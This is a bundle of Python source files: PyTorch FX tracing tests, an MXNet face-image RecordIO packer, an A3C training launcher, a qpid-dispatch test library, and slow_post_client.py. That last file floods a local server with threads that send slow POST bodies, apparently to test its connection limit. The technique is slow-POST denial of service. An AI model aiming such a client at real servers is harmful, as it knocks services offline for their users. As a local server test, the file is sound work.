"batch_norm": CONTROL_FLOW,
"binary_cross_entropy": CONTROL_FLOW,
"binary_cross_entropy_with_logits": CONTROL_FLOW,
"celu": CONTROL_FLOW,
"cosine_embedding_loss": CONTROL_FLOW,
"cross_entropy": CONTROL_FLOW,
"ctc_loss": CONTROL_FLOW,
"dropout": CONTROL_FLOW,
"dropout2d": CONTROL_FLOW,
"dropout3d": CONTROL_FLOW,
"elu": CONTROL_FLOW,
"embedding": CONTROL_FLOW,
"embedding_bag": CONTROL_FLOW,
"feature_alpha_dropout": CONTROL_FLOW,
"fold": CONTROL_FLOW,
"gaussian_nll_loss": CONTROL_FLOW,
"glu": CONTROL_FLOW,
"grid_sample": CONTROL_FLOW,
"gumbel_softmax": CONTROL_FLOW,
"hardsigmoid": CONTROL_FLOW,
"hardswish": CONTROL_FLOW,
"hardtanh": CONTROL_FLOW,
"hinge_embedding_loss": CONTROL_FLOW,
"huber_loss": CONTROL_FLOW,
"interpolate": CONTROL_FLOW,
"kl_div": CONTROL_FLOW,
"l1_loss": CONTROL_FLOW,
"leaky_relu": CONTROL_FLOW,
"local_response_norm": CONTROL_FLOW,
"margin_ranking_loss": CONTROL_FLOW,
"max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"mse_loss": CONTROL_FLOW,
"multi_head_attention_forward": CONTROL_FLOW,
"multi_margin_loss": CONTROL_FLOW,
"multilabel_margin_loss": CONTROL_FLOW,
"multilabel_soft_margin_loss": CONTROL_FLOW,
"nll_loss": CONTROL_FLOW,
"poisson_nll_loss": CONTROL_FLOW,
"relu": CONTROL_FLOW,
"relu6": CONTROL_FLOW,
"rrelu": CONTROL_FLOW,
"selu": CONTROL_FLOW,
"silu": CONTROL_FLOW,
"mish": CONTROL_FLOW,
"smooth_l1_loss": CONTROL_FLOW,
"soft_margin_loss": CONTROL_FLOW,
"threshold": CONTROL_FLOW,
"triplet_margin_loss": CONTROL_FLOW,
"triplet_margin_with_distance_loss": CONTROL_FLOW,
"unfold": CONTROL_FLOW,
"upsample": CONTROL_FLOW,
"upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
"upsample_nearest": INTERPOLATE_ARGS_CONFLICT,
"normalize" : MUTABLE,
}
# List of nn.functionals with Tensor inputs but not with type annotation
FUNCTIONALS_WITHOUT_ANNOTATION = (
"adaptive_max_pool1d",
"adaptive_max_pool2d",
"adaptive_max_pool3d",
"fractional_max_pool2d",
"fractional_max_pool3d",
"max_pool1d",
"max_pool2d",
"max_pool3d",
"gaussian_nll_loss",
"upsample",
"upsample_bilinear",
"upsample_nearest",
)
# Inconsistent behavior between Python 3.8 and other Python versions:
# - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED`
# - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
# internal exception above
# Use the following map to override the expected exception for Python 3.8
UNTRACEABLE_FUNCTIONALS_PY38 = {
"adaptive_max_pool1d": PROXY_ITERATED,
"adaptive_max_pool2d": PROXY_ITERATED,
"adaptive_max_pool3d": PROXY_ITERATED,
"fractional_max_pool2d": PROXY_ITERATED,
"fractional_max_pool3d": PROXY_ITERATED,
"max_pool1d": PROXY_ITERATED,
"max_pool2d": PROXY_ITERATED,
"max_pool3d": PROXY_ITERATED,
"group_norm": LEN_ERROR
}
@classmethod
def _get_functional(cls):
functional_list = []
for f in dir(torch.nn.functional):
if not f.islower():
continue
# Ignore internal functions
if f.startswith('_'):
continue
# Ignore supporting functions
if f in cls.IGNORE_FUNCS:
continue
fn = getattr(torch.nn.functional, f)
# Ignore non-callable object like modules
if not isinstance(fn, Callable):
continue
if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
try:
sig = inspect.signature(fn)
has_tensor_arg = False
for arg, param in sig.parameters.items():
if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
has_tensor_arg = True
if not has_tensor_arg:
continue
# Signature could not be inspected; skip the Tensor-argument check and include the functional anyway
except ValueError:
pass
functional_list.append((f, fn))
return functional_list
@classmethod
def generate_test_func(cls, func_name, fn):
def functional_test(self):
if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
sys.version_info >= (3, 8) and sys.version_info < (3, 10):
exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
elif func_name in self.UNTRACEABLE_FUNCTIONALS:
exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
else:
symbolic_trace(fn)
return functional_test
@classmethod
def generate_tests(cls):
functional_list = cls._get_functional()
for func_name, fn in functional_list:
test_name = "test_nn_functional_" + func_name
functional_test = cls.generate_test_func(func_name, fn)
setattr(cls, test_name, functional_test)
@classmethod
def setUpClass(cls):
def no(*args, **kwargs):
return False
for name in cls.TO_PATCH.keys():
cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
setattr(torch.nn.functional, name, no)
@classmethod
def tearDownClass(cls):
for name in cls.TO_PATCH.keys():
setattr(torch.nn.functional, name, cls.TO_PATCH[name])
TestFunctionalTracing.generate_tests()
instantiate_device_type_tests(TestOperatorSignatures, globals())
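# Dynamically generates tracing tests for torchvision classification, segmentation, detection,
# and video models, comparing eager, symbolically traced, and scripted outputs.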
@skipIfNoTorchVision
class TestVisionTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations while tracing is feature-flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
INCONSISTENT_TYPE = (
RuntimeError,
r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor"
)
UNTRACEABLE_MODELS = {
"fasterrcnn_resnet50_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED,
"maskrcnn_resnet50_fpn": PROXY_ITERATED,
"keypointrcnn_resnet50_fpn": PROXY_ITERATED,
"retinanet_resnet50_fpn": PROXY_ITERATED,
}
UNSCRIPTABLE_MODELS = {
"googlenet": INCONSISTENT_TYPE,
"inception_v3": INCONSISTENT_TYPE,
}
output_transform = {
"fcn_resnet50": lambda x: x["out"],
"fcn_resnet101": lambda x: x["out"],
"deeplabv3_resnet50": lambda x: x["out"],
"deeplabv3_resnet101": lambda x: x["out"],
"deeplabv3_mobilenet_v3_large": lambda x: x["out"],
"lraspp_mobilenet_v3_large": lambda x: x["out"],
"fasterrcnn_resnet50_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1],
"maskrcnn_resnet50_fpn": lambda x: x[1],
"keypointrcnn_resnet50_fpn": lambda x: x[1],
"retinanet_resnet50_fpn": lambda x: x[1],
}
@classmethod
def generate_test_fn(cls, name, model_fn, x, kwargs):
def run_test(self):
model = model_fn(**kwargs)
model = model.eval()
if name in self.UNTRACEABLE_MODELS:
err, exc = self.UNTRACEABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
graph = symbolic_trace(model)
else:
out_transform = self.output_transform.get(name, lambda x: x)
graph : torch.fx.GraphModule = symbolic_trace(model)
a = out_transform(model(x))
b = out_transform(graph(x))
self.assertEqual(a, b)
if name in self.UNSCRIPTABLE_MODELS:
err, exc = self.UNSCRIPTABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
script = torch.jit.script(graph)
else:
script = torch.jit.script(graph)
c = out_transform(script(x))
self.assertEqual(a, c)
return run_test
@classmethod
def generate_classification_tests(cls):
for k, v in torchvision_models.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_' + k
x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_segmentation_tests(cls):
for k, v in torchvision_models.segmentation.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_segmentation_' + k
x = torch.rand(1, 3, 32, 32)
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_detection_tests(cls):
for k, v in torchvision_models.detection.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_detection_' + k
x = [torch.rand(3, 300, 300)]
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_video_tests(cls):
for k, v in torchvision_models.video.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_video_' + k
x = torch.rand(1, 3, 4, 112, 112)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_tests(cls):
cls.generate_classification_tests()
cls.generate_detection_tests()
cls.generate_segmentation_tests()
cls.generate_video_tests()
if HAS_TORCHVISION:
TestVisionTracing.generate_tests()
if __name__ == '__main__':
run_tests()
|
face2rec2.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
#curr_path = os.path.abspath(os.path.dirname(__file__))
#sys.path.append(os.path.join(curr_path, "../python"))
import mxnet as mx
import random
import argparse
import cv2
import time
import traceback
#from builtins import range
from easydict import EasyDict as edict
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'common'))
import face_preprocess
import face_image
import numpy as np
try:
import multiprocessing
except ImportError:
multiprocessing = None
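# Generator over a .lst file: yields one flag-0 record per aligned/landmarked image, then a
# flag-2 header record followed by one flag-2 record per identity giving its [start, end)
# image-id range.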
def read_list(path_in):
with open(path_in) as fin:
identities = []
last = [-1, -1]
_id = 1
while True:
line = fin.readline()
if not line:
break
item = edict()
item.flag = 0
item.image_path, label, item.bbox, item.landmark, item.aligned = face_preprocess.parse_lst_line(line)
if not item.aligned and item.landmark is None:
#print('ignore line', line)
continue
item.id = _id
item.label = [label, item.aligned]
yield item
if label!=last[0]:
if last[1]>=0:
identities.append( (last[1], _id) )
last[0] = label
last[1] = _id
_id+=1
identities.append( (last[1], _id) )
item = edict()
item.flag = 2
item.id = 0
item.label = [float(_id), float(_id+len(identities))]
yield item
for identity in identities:
item = edict()
item.flag = 2
item.id = _id
_id+=1
item.label = [float(identity[0]), float(identity[1])]
yield item
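# Encodes one list item into a RecordIO packet on q_out. Flag-0 items are read with cv2 and
# either cropped around the bbox with a 44-pixel margin and resized to 224x224 (aligned) or
# warped via face_preprocess.preprocess using the landmarks; flag-2 items are packed with an
# empty payload.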
def image_encode(args, i, item, q_out):
oitem = [item.id]
#print('flag', item.flag)
if item.flag==0:
fullpath = item.image_path
header = mx.recordio.IRHeader(item.flag, item.label, item.id, 0)
#print('write', item.flag, item.id, item.label)
if item.aligned:
# with open(fullpath, 'rb') as fin:
# img = fin.read()
# s = mx.recordio.pack(header, img)
img = cv2.imread(fullpath, args.color)
det = item.bbox
margin = 44
bb = np.zeros(4, dtype=np.int32)
bb[0] = np.maximum(det[0] - margin / 2, 0)
bb[1] = np.maximum(det[1] - margin / 2, 0)
bb[2] = np.minimum(det[2] + margin / 2, img.shape[1])
bb[3] = np.minimum(det[3] + margin / 2, img.shape[0])
img = img[bb[1]:bb[3], bb[0]:bb[2], :]
img = cv2.resize(img, (224, 224))
s = mx.recordio.pack_img(header, img, quality=args.quality, img_fmt=args.encoding)
q_out.put((i, s, oitem))
else:
img = cv2.imread(fullpath, args.color)
assert item.landmark is not None
img = face_preprocess.preprocess(img, bbox = item.bbox, landmark=item.landmark, image_size='%d,%d'%(args.image_h, args.image_w))
s = mx.recordio.pack_img(header, img, quality=args.quality, img_fmt=args.encoding)
q_out.put((i, s, oitem))
else:
header = mx.recordio.IRHeader(item.flag, item.label, item.id, 0)
#print('write', item.flag, item.id, item.label)
s = mx.recordio.pack(header, b'')
q_out.put((i, s, oitem))
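# Reader process loop: consumes (index, item) pairs from q_in until a None sentinel arrives
# and pushes the encoded packets onto q_out.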
def read_worker(args, q_in, q_out):
while True:
deq = q_in.get()
if deq is None:
break
i, item = deq
image_encode(args, i, item, q_out)
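# Writer process: buffers out-of-order packets from q_out by their original index and writes
# them sequentially to the .rec/.idx pair via MXIndexedRecordIO, logging throughput every
# 1000 records.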
def write_worker(q_out, fname, working_dir):
pre_time = time.time()
count = 0
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
buf = {}
more = True
while more:
deq = q_out.get()
if deq is not None:
i, s, item = deq
buf[i] = (s, item)
else:
more = False
while count in buf:
s, item = buf[count]
del buf[count]
if s is not None:
#print('write idx', item[0])
record.write_idx(item[0], s)
if count % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', count)
pre_time = cur_time
count += 1
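# Command-line options largely carried over from mxnet's im2rec tool (the help text still
# refers to im2rec); in this script the --list branch is a no-op and only record creation is used.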
def parse_args():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Create an image list or \
make a record database by reading from an image list')
parser.add_argument('prefix', help='prefix of input/output lst and rec files.')
#parser.add_argument('root', help='path to folder containing images.')
cgroup = parser.add_argument_group('Options for creating image lists')
cgroup.add_argument('--list', type=bool, default=False,
help='If this is set im2rec will create image list(s) by traversing root folder\
and output to <prefix>.lst.\
Otherwise im2rec will read <prefix>.lst and create a database at <prefix>.rec')
cgroup.add_argument('--exts', nargs='+', default=['.jpeg', '.jpg'],
help='list of acceptable image extensions.')
cgroup.add_argument('--chunks', type=int, default=1, help='number of chunks.')
cgroup.add_argument('--train-ratio', type=float, default=1.0,
help='Ratio of images to use for training.')
cgroup.add_argument('--test-ratio', type=float, default=0,
help='Ratio of images to use for testing.')
cgroup.add_argument('--recursive', type=bool, default=False,
help='If true recursively walk through subdirs and assign a unique label\
to images in each folder. Otherwise only include images in the root folder\
and give them label 0.')
cgroup.add_argument('--shuffle', type=bool, default=True, help='If this is set as True, \
im2rec will randomize the image order in <prefix>.lst')
rgroup = parser.add_argument_group('Options for creating database')
rgroup.add_argument('--quality', type=int, default=95,
help='JPEG quality for encoding, 1-100; or PNG compression for encoding, 1-9')
rgroup.add_argument('--num-thread', type=int, default=8,
help='number of threads to use for encoding. Order of images will be different\
from the input list if >1. The input list will be modified to match the\
resulting order.')
rgroup.add_argument('--color', type=int, default=1, choices=[-1, 0, 1],
help='specify the color mode of the loaded image.\
1: Loads a color image. Any transparency of image will be neglected. It is the default flag.\
0: Loads image in grayscale mode.\
-1:Loads image as such including alpha channel.')
rgroup.add_argument('--encoding', type=str, default='.jpg', choices=['.jpg', '.png'],
help='specify the encoding of the images.')
rgroup.add_argument('--pack-label', type=bool, default=False,
help='Whether to also pack multi dimensional label in the record file')
args = parser.parse_args()
args.prefix = os.path.abspath(args.prefix)
#args.root = os.path.abspath(args.root)
return args
if __name__ == '__main__':
args = parse_args()
if args.list:
pass
#make_list(args)
else:
if os.path.isdir(args.prefix):
working_dir = args.prefix
else:
working_dir = os.path.dirname(args.prefix)
# prop = face_image.load_property(working_dir)
image_size = [224, 224] #prop.image_size
print('image_size', image_size)
args.image_h = image_size[0]
args.image_w = image_size[1]
files = [os.path.join(working_dir, fname) for fname in os.listdir(working_dir)
if os.path.isfile(os.path.join(working_dir, fname))]
count = 0
for fname in files:
if fname.startswith(args.prefix) and fname.endswith('.lst'):
print('Creating .rec file from', fname, 'in', working_dir)
count += 1
image_list = read_list(fname)
# -- write_record -- #
if args.num_thread > 1 and multiprocessing is not None:
q_in = [multiprocessing.Queue(1024) for i in range(args.num_thread)]
q_out = multiprocessing.Queue(1024)
read_process = [multiprocessing.Process(target=read_worker, args=(args, q_in[i], q_out)) \
for i in range(args.num_thread)]
for p in read_process:
p.start()
write_process = multiprocessing.Process(target=write_worker, args=(q_out, fname, working_dir))
write_process.start()
for i, item in enumerate(image_list):
q_in[i % len(q_in)].put((i, item))
for q in q_in:
q.put(None)
for p in read_process:
p.join()
q_out.put(None)
write_process.join()
else:
print('multiprocessing not available, falling back to single-threaded encoding')
try:
import Queue as queue
except ImportError:
import queue
q_out = queue.Queue()
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
cnt = 0
pre_time = time.time()
for i, item in enumerate(image_list):
image_encode(args, i, item, q_out)
if q_out.empty():
continue
_, s, item = q_out.get()
#header, _ = mx.recordio.unpack(s)
#print('write header label', header.label)
record.write_idx(item[0], s)
if cnt % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', cnt)
pre_time = cur_time
cnt += 1
if not count:
print('Did not find any .lst file with prefix %s' % args.prefix)
|
main.py
|
from __future__ import print_function
import argparse
import os
import sys
import torch
import torch.optim as optim
import torch.multiprocessing as mp
import torch.nn as nn
import torch.nn.functional as F
from envs import create_atari_env
from train import train
from test import test
from utils import build_model
import my_optim
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
parser = argparse.ArgumentParser(description='Asynchronous AC and Art')
subparsers = parser.add_subparsers(dest='agent')
subparsers.required = True
ac_parser = subparsers.add_parser('ac', help='actor critic')
art_parser = subparsers.add_parser('art', help='art')
parser.add_argument('--lr', type=float, default=0.0001, metavar='LR',
help='learning rate (default: 0.0001)')
parser.add_argument('--gamma', type=float, default=0.99, metavar='G',
help='discount factor for rewards (default: 0.99)')
parser.add_argument('--tau', type=float, default=1.00, metavar='T',
help='parameter for GAE (default: 1.00)')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--num-processes', type=int, default=4, metavar='N',
help='how many training processes to use (default: 4)')
parser.add_argument('--max-episode-length', type=int, default=10000, metavar='M',
help='maximum length of an episode (default: 10000)')
parser.add_argument('--env-name', default='PongDeterministic-v4', metavar='ENV',
help='environment to train on (default: PongDeterministic-v4)')
parser.add_argument('--no-shared', default=False, metavar='O',
help='use an optimizer without shared momentum.')
ac_parser.add_argument('--num-steps', type=int, default=20, metavar='NS',
help='number of forward steps in A3C (default: 20)')
art_parser.add_argument('--dicho', action='store_true',
help='model decomposes value function dichotomically')
art_parser.add_argument('--remove-constant', action='store_true',
help='the value model learns a model of the form c * T'
'+ V')
art_subparsers = art_parser.add_subparsers(dest='lambda_type')
constant_art_parser = art_subparsers.add_parser('constant')
decaying_art_parser = art_subparsers.add_parser('decaying')
decaying_art_parser.add_argument('--alpha', default=3, metavar='A',
help='alpha parameter of art')
decaying_art_parser.add_argument('--L0', default=100, metavar='L0',
help='L0 parameter of art')
if __name__ == '__main__':
os.environ['OMP_NUM_THREADS'] = '1'
args = parser.parse_args()
torch.manual_seed(args.seed)
env = create_atari_env(args.env_name)
shared_model = build_model(env.observation_space.shape[0],
env.action_space, args)
shared_model.share_memory()
if args.no_shared:
optimizer = None
else:
optimizer = my_optim.SharedAdam(shared_model.parameters(), lr=args.lr)
optimizer.share_memory()
processes = []
p = mp.Process(target=test, args=(args.num_processes, args, shared_model))
p.start()
processes.append(p)
for rank in range(0, args.num_processes):
p = mp.Process(target=train, args=(args.agent, rank, args, shared_model, optimizer))
p.start()
processes.append(p)
try:
for p in processes:
p.join()
except KeyboardInterrupt:
print('\nmain thread interrupted\n')
|
slow_post_client.py
|
'''
'''
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import threading
import requests
import argparse
def gen(slow_time):
for _ in range(slow_time):
yield b'a'
time.sleep(1)
def slow_post(port, slow_time):
requests.post('http://127.0.0.1:{0}/'.format(port, ), data=gen(slow_time))
def makerequest(port, connection_limit):
client_timeout = 3
for _ in range(connection_limit):
t = threading.Thread(target=slow_post, args=(port, client_timeout + 10))
t.daemon = True
t.start()
time.sleep(1)
r = requests.get('http://127.0.0.1:{0}/'.format(port,))
print(r.status_code)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--port", "-p",
type=int,
help="Port to use")
parser.add_argument("--connectionlimit", "-c",
type=int,
help="connection limit")
args = parser.parse_args()
makerequest(args.port, args.connectionlimit)
if __name__ == '__main__':
main()
|
system_test.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
"""System test library, provides tools for tests that start multiple processes,
with special support for qdrouter processes.
Features:
- Create separate directories for each test.
- Save logs, sub-process output, core files etc.
- Automated clean-up after tests: kill sub-processes etc.
- Tools to manipulate qdrouter configuration files.
- Sundry other tools.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import errno
import sys
import time
import __main__
import functools
import os
import random
import re
import shutil
import socket
import subprocess
from copy import copy
from datetime import datetime
from subprocess import PIPE, STDOUT
try:
import queue as Queue # 3.x
except ImportError:
import Queue as Queue # 2.7
from threading import Thread
from threading import Event
import json
import uuid
import unittest
from proton import Message
from proton import Delivery
from proton.handlers import MessagingHandler
from proton.reactor import AtLeastOnce, Container
from proton.reactor import AtMostOnce
from qpid_dispatch.management.client import Node
from qpid_dispatch_internal.compat import dict_iteritems
# Optional modules
MISSING_MODULES = []
try:
import qpidtoollibs
except ImportError as err:
qpidtoollibs = None # pylint: disable=invalid-name
MISSING_MODULES.append(str(err))
try:
import qpid_messaging as qm
except ImportError as err:
qm = None # pylint: disable=invalid-name
MISSING_MODULES.append(str(err))
is_python2 = sys.version_info[0] == 2
def find_exe(program):
"""Find an executable in the system PATH"""
def is_exe(fpath):
"""True if fpath is executable"""
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
mydir = os.path.split(program)[0]
if mydir:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
# The directory where this module lives. Used to locate static configuration files etc.
DIR = os.path.dirname(__file__)
def _check_requirements():
"""If requirements are missing, return a message, else return empty string."""
missing = MISSING_MODULES
required_exes = ['qdrouterd']
missing += ["No exectuable %s" % e for e in required_exes if not find_exe(e)]
if missing:
return "%s: %s" % (__name__, ", ".join(missing))
MISSING_REQUIREMENTS = _check_requirements()
def retry_delay(deadline, delay, max_delay):
"""For internal use in retry. Sleep as required
and return the new delay or None if retry should time out"""
remaining = deadline - time.time()
if remaining <= 0:
return None
time.sleep(min(delay, remaining))
return min(delay * 2, max_delay)
# Valgrind significantly slows down the response time of the router, so use a
# long default timeout
TIMEOUT = float(os.environ.get("QPID_SYSTEM_TEST_TIMEOUT", 60))
def retry(function, timeout=TIMEOUT, delay=.001, max_delay=1):
"""Call function until it returns a true value or timeout expires.
Double the delay for each retry up to max_delay.
Returns what function returns or None if timeout expires.
"""
deadline = time.time() + timeout
while True:
ret = function()
if ret:
return ret
else:
delay = retry_delay(deadline, delay, max_delay)
if delay is None:
return None
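# Illustrative sketch (not part of the original test library): retry() can poll for
# any condition that eventually becomes truthy, e.g. waiting for a file to appear.
# The path and timeout below are hypothetical example values.
def _example_wait_for_file(path="/tmp/example.ready", timeout=5):
    """Return the path once it exists, or None if the retry times out."""
    return retry(lambda: path if os.path.exists(path) else None,
                 timeout=timeout, delay=0.01, max_delay=0.5)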
def retry_exception(function, timeout=TIMEOUT, delay=.001, max_delay=1, exception_test=None):
"""Call function until it returns without exception or timeout expires.
Double the delay for each retry up to max_delay.
Calls exception_test with any exception raised by function, exception_test
may itself raise an exception to terminate the retry.
Returns what function returns if it succeeds before timeout.
Raises last exception raised by function on timeout.
"""
deadline = time.time() + timeout
while True:
try:
return function()
except Exception as e: # pylint: disable=broad-except
if exception_test:
exception_test(e)
delay = retry_delay(deadline, delay, max_delay)
if delay is None:
raise
def get_local_host_socket(protocol_family='IPv4'):
if protocol_family == 'IPv4':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = '127.0.0.1'
elif protocol_family == 'IPv6':
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
host = '::1'
return s, host
def port_available(port, protocol_family='IPv4'):
"""Return true if connecting to host:port gives 'connection refused'."""
s, host = get_local_host_socket(protocol_family)
available = False
try:
s.connect((host, port))
except socket.error as e:
available = e.errno == errno.ECONNREFUSED
except:
pass
s.close()
return available
def wait_port(port, protocol_family='IPv4', **retry_kwargs):
"""Wait up to timeout for port (on host) to be connectable.
Takes same keyword arguments as retry to control the timeout"""
def check(e):
"""Only retry on connection refused"""
if not isinstance(e, socket.error) or not e.errno == errno.ECONNREFUSED:
raise
host = None
def connect():
# macOS gives EINVAL for all connection attempts after a ECONNREFUSED
# man 3 connect: "If connect() fails, the state of the socket is unspecified. [...]"
s, host = get_local_host_socket(protocol_family)
try:
s.connect((host, port))
finally:
s.close()
try:
retry_exception(connect, exception_test=check, **retry_kwargs)
except Exception as e:
raise Exception("wait_port timeout on host %s port %s: %s" % (host, port, e))
def wait_ports(ports, **retry_kwargs):
"""Wait up to timeout for all ports (on host) to be connectable.
Takes same keyword arguments as retry to control the timeout"""
for port, protocol_family in dict_iteritems(ports):
wait_port(port=port, protocol_family=protocol_family, **retry_kwargs)
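# Illustrative sketch (assumption, not original code): waiting for a mixed set of
# IPv4/IPv6 listener ports, as a test would do after starting a router process.
def _example_wait_for_listeners(ipv4_port, ipv6_port):
    """Block until both ports accept connections or the retry times out."""
    wait_ports({ipv4_port: 'IPv4', ipv6_port: 'IPv6'}, timeout=10)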
def message(**properties):
"""Convenience to create a proton.Message with properties set"""
m = Message()
for name, value in dict_iteritems(properties):
getattr(m, name) # Raise exception if not a valid message attribute.
setattr(m, name, value)
return m
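# Illustrative sketch: message() raises on unknown attributes, so typos in property
# names fail fast; the address and body below are hypothetical example values.
def _example_request_message(reply_addr):
    """Build a simple request message addressed to an example queue."""
    return message(address="examples.queue", reply_to=reply_addr, body="ping")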
class Process(subprocess.Popen):
"""
Popen that can be torn down at the end of a TestCase and stores its output.
"""
# Expected states of a Process at teardown
RUNNING = -1 # Still running
EXIT_OK = 0 # Exit status 0
EXIT_FAIL = 1 # Exit status 1
unique_id = 0
@classmethod
def unique(cls, name):
cls.unique_id += 1
return "%s-%s" % (name, cls.unique_id)
def __init__(self, args, name=None, expect=EXIT_OK, **kwargs):
"""
Takes same arguments as subprocess.Popen. Some additional/special args:
        @param expect: Raise error if process status not as expected at end of test:
            L{RUNNING} - expect still running.
            L{EXIT_OK} - expect process to have terminated with 0 exit status.
            L{EXIT_FAIL} - expect process to have terminated with exit status 1.
integer - expected return code
@keyword stdout: Defaults to the file name+".out"
@keyword stderr: Defaults to be the same as stdout
"""
self.name = name or os.path.basename(args[0])
self.args, self.expect = args, expect
self.outdir = os.getcwd()
self.outfile = os.path.abspath(self.unique(self.name))
self.torndown = False
with open(self.outfile + '.out', 'w') as out:
kwargs.setdefault('stdout', out)
kwargs.setdefault('stderr', subprocess.STDOUT)
try:
super(Process, self).__init__(args, **kwargs)
with open(self.outfile + '.cmd', 'w') as f:
f.write("%s\npid=%s\n" % (' '.join(args), self.pid))
except Exception as e:
raise Exception("subprocess.Popen(%s, %s) failed: %s: %s" %
(args, kwargs, type(e).__name__, e))
def assert_running(self):
"""Assert that the process is still running"""
assert self.poll() is None, "%s: exited" % ' '.join(self.args)
def teardown(self):
"""Check process status and stop the process if necessary"""
if self.torndown:
return
self.torndown = True
def error(msg):
with open(self.outfile + '.out') as f:
raise RuntimeError("Process %s error: %s\n%s\n%s\n>>>>\n%s<<<<" % (
self.pid, msg, ' '.join(self.args),
self.outfile + '.cmd', f.read()))
status = self.poll()
if status is None: # Still running
self.terminate()
